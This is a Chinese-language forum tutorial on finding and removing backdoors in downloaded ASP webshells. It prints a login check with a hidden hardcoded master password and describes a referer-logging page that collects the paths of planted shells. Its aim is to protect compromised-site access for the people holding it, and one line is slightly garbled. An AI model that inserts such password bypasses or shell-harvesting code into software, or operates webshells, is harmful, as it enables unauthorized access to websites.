我等小菜自己寫不來asp馬,只能用大蝦寫的,但網(wǎng)上流傳的都不知道是幾手的了, 難免有些居心不良的人會(huì)在里面加后門。
好不容易拿到個(gè)shell又被別人偷走了怎么甘心。∷栽谙峦阛sp木馬后要先檢查有沒后門,通常加了后門的為了隱秘性,都會(huì)加密!所以首先我們要先解密 asp木馬解密工具解密后先檢查有無萬能密碼,也就是說就算你改了木馬的密碼,他也能用這個(gè)密碼來登錄
正常的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對(duì)不起,密碼驗(yàn)證失敗!"
加有萬能密碼的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對(duì)不起,密碼驗(yàn)證失敗!"
1111111就是傳說中的萬能密碼了。
找到萬能密碼代碼后把or request.form("pass")="1111111" 刪除就OK了!
下面來找馬大多數(shù)都喜歡用框架掛馬:
找到后刪了,到此asp后門就算剔除了!
下面教大家后門的原理:
這是一段收信的asp代碼將其保存為1.asp
以下是引用片段: |
代碼基本意思就是:“HTTP_REFERER” 鏈接到當(dāng)前頁面的前一頁面的 URL 地址
簡單來說就是獲得webshell的地址然后記錄在bobo.txt這里文本里
上傳到空間比如 http://127.0.0.1/1.asp
以下是引用片段: |
插到asp木馬中,那么別人訪問這個(gè)被掛了馬的asp木馬就會(huì)生成個(gè)bobo.txt里面就會(huì)有asp大馬的路徑了
我們學(xué)習(xí)他是為了更好的理解,大家千萬別用來整菜鳥!